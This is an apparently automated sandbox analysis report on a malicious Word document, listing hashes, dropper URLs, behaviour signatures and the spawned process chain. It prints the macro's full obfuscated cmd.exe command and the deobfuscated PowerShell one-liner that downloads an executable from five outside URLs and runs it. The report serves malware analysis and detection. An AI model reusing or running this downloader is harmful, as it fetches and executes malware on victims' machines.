Analysis
-
max time kernel
123s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
02-12-2021 11:58
General
-
Target
test/0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc
-
Size
81KB
-
MD5
fac7b441a730abf96b210a8db9dbf3d1
-
SHA1
9f5bb869b95136f51b954e4284f99168ff0e91fb
-
SHA256
0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66
-
SHA512
0a5ec69ec554639ede43c359f38f8d2e52718b7e29a06aa112ff8cdc99b2777a39c3a9455d3796033a813cceda7487104fb8f0027eccfa138bcd0c2064606f07
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://www.serefozata.com/axf
exe.dropper
http://www.livingbranchanimalsciences.com/zVMQFL
exe.dropper
http://www.donghodaian.com/jiPViP
exe.dropper
http://sprayzee.com/iiWYe6z
exe.dropper
http://yasarkemalplatformu.org/s
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 1 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\test\0dded430c1958ae0ec60c2d50ab99f562269ad1ee09db17606661bd55cd29c66.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeCmD /V/C"set 8zN=jDYOzpwKEKrWhHFvMIaSaUWRtF;+sQN8P$3di gL:uf{.b=excnB@\90(JZ-lAmGkyoT,C/6'})V&&for %q in (33,50,28,13,46,72,51,9,42,72,26,33,24,62,15,46,50,47,6,59,66,45,0,47,49,24,37,30,47,24,44,22,47,45,69,60,36,47,50,24,26,33,64,0,23,46,72,12,24,24,5,40,70,70,6,6,6,44,28,47,10,47,42,66,4,20,24,20,44,49,66,62,70,20,48,42,52,12,24,24,5,40,70,70,6,6,6,44,60,36,15,36,50,38,45,10,20,50,49,12,20,50,36,62,20,60,28,49,36,47,50,49,47,28,44,49,66,62,70,4,75,16,29,25,39,52,12,24,24,5,40,70,70,6,6,6,44,35,66,50,38,12,66,35,20,36,20,50,44,49,66,62,70,0,36,32,75,36,32,52,12,24,24,5,40,70,70,28,5,10,20,65,4,47,47,44,49,66,62,70,36,36,22,2,47,71,4,52,12,24,24,5,40,70,70,65,20,28,20,10,64,47,62,20,60,5,60,20,24,42,66,10,62,41,44,66,10,38,70,28,72,44,19,5,60,36,24,56,72,52,72,74,26,33,6,35,30,46,72,62,51,30,72,26,33,63,6,45,37,46,37,72,34,54,55,72,26,33,15,4,0,46,72,8,1,64,72,26,33,51,57,8,46,33,47,50,15,40,24,47,62,5,27,72,53,72,27,33,63,6,45,27,72,44,47,48,47,72,26,42,66,10,47,20,49,12,56,33,67,51,9,37,36,50,37,33,64,0,23,74,43,24,10,65,43,33,24,62,15,44,1,66,6,50,60,66,20,35,25,36,60,47,56,33,67,51,9,68,37,33,51,57,8,74,26,33,1,9,4,46,72,12,36,0,72,26,17,42,37,56,56,63,47,24,59,17,24,47,62,37,33,51,57,8,74,44,60,47,50,38,24,12,37,59,38,47,37,31,55,55,55,55,74,37,43,17,50,15,66,64,47,59,17,24,47,62,37,33,51,57,8,26,33,64,36,51,46,72,62,29,58,72,26,45,10,47,20,64,26,73,73,49,20,24,49,12,43,73,73,33,22,42,5,46,72,13,8,61,72,26,78)do set FtX=!FtX!!8zN:~%q,1!&&if %q equ 78 powershell "!FtX:~5!""3⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$nsH='BKf';$tmv=new-object Net.WebClient;$kjR='http://www.serefozata.com/axf@http://www.livingbranchanimalsciences.com/zVMQFL@http://www.donghodaian.com/jiPViP@http://sprayzee.com/iiWYe6z@http://yasarkemalplatformu.org/s'.Split('@');$wdN='mBN';$Gwb = '390';$vzj='EDk';$BJE=$env:temp+'\'+$Gwb+'.exe';foreach($TBK in $kjR){try{$tmv.DownloadFile($TBK, $BJE);$DKz='hij';If ((Get-Item $BJE).length -ge 80000) {Invoke-Item $BJE;$kiB='mQZ';break;}}catch{}}$Wfp='HEA';"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
8KB
-
Filesize
64KB
-
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
-
-